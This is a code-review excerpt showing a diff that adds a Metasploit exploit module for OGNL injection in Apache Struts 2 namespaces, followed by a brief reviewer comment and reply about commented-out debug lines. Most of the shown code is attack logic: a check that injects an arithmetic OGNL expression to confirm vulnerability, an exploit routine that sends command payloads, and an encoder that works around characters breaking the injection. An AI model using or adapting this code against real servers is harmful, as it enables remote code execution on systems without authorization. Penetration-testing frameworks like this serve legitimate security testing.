modules/exploits/multi/http/struts2_namespace_ognl.rb

```diff
@@ -0,0 +1,337 @@
+        ]
+      )
+  end
+
+  def check
+    # Generate two random numbers, ask the target to add them together.
+    #   If it does, it's vulnerable.
+    a = rand(10000)
+    b = rand(10000)
+    c = a+b
+
+    ognl = "#{a}+#{b}"
+
+    begin
+      resp = send_struts_request(ognl)
+    rescue Msf::Exploit::Failed => error
+      print_error(error.to_s)
+      return Exploit::CheckCode::Unknown
+    end
+
+    # If vulnerable, the server should return an HTTP 302 (Redirect)
+    #   and the 'Location' header should contain the sum of our two numbers (a+b)
+    if resp && resp.code == 302 && (resp.headers['Location'].include?c.to_s)
+      vprint_status("Redirected to:  #{resp.headers['Location']}")
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    case payload.arch.first
+    when ARCH_CMD
+      resp = execute_command(payload.encoded)
+    else
+      # fail_with(Failure::BadConfig,"Only cmd payloads are currently supported.")
+      resp = send_payload()
+    end
+  end
+
+  def encode_ognl(ognl, string_delimiter:"'")
+    # Check and fail if the command contains the follow bad characters:
+    #   ';' seems to terminates the OGNL statement
+    #   '/' causes the target to return an HTTP/400 error
+    #   '\' causes the target to return an HTTP/400 error (sometimes?)
+    #   '\r' ends the GET request prematurely
+    #   '\n' ends the GET request prematurely
+
+    # TODO: Make sure the following line is uncommented
+    bad_chars = [';','\\','\r','\n']    # and maybe '/'
+    bad_chars.each do |c|
+      if ognl.include?c
+        print_error("Bad OGNL request: #{ognl}")
+        fail_with(Failure::BadConfig, "OGNL request cannot contain a '#{c}'")
+      end
+    end
+    
+    # The following list of characters *must* be encoded or ORNL will asplode
+    encodable_chars = { "%": "%25",       # Always do this one first.  :-)
+                        " ": "%20",
+                        "\"":"%22",
+                        "#": "%23",
+                        "'": "%27",
+                        "<": "%3c",
+                        ">": "%3e",
+                        "?": "%3f",
+                        "^": "%5e",
+                        "`": "%60",
+                        "{": "%7b",
+                        "|": "%7c",
+                        "}": "%7d",
+                       #"\/":"%2f",       # Don't do this.  Just leave it front-slashes in as normal.
+                       #";": "%3b",       # Doesn't work.  Anyone have a cool idea for a workaround?
+                       #"\\":"%5c",       # Doesn't work.  Anyone have a cool idea for a workaround?
+                       #"\\":"%5c%5c",    # Doesn't work.  Anyone have a cool idea for a workaround?
+                      }
+
+    encodable_chars.each do |k,v|
+     #print_status("   #{k} -> #{v}")
```

Comment:
Please remove commented-out debugging statements if they aren't intended to be used.

Reply:
Noting for the future that if I see commented-out debugging statements, I will be more lax about leaving them if they look intended for a future audience.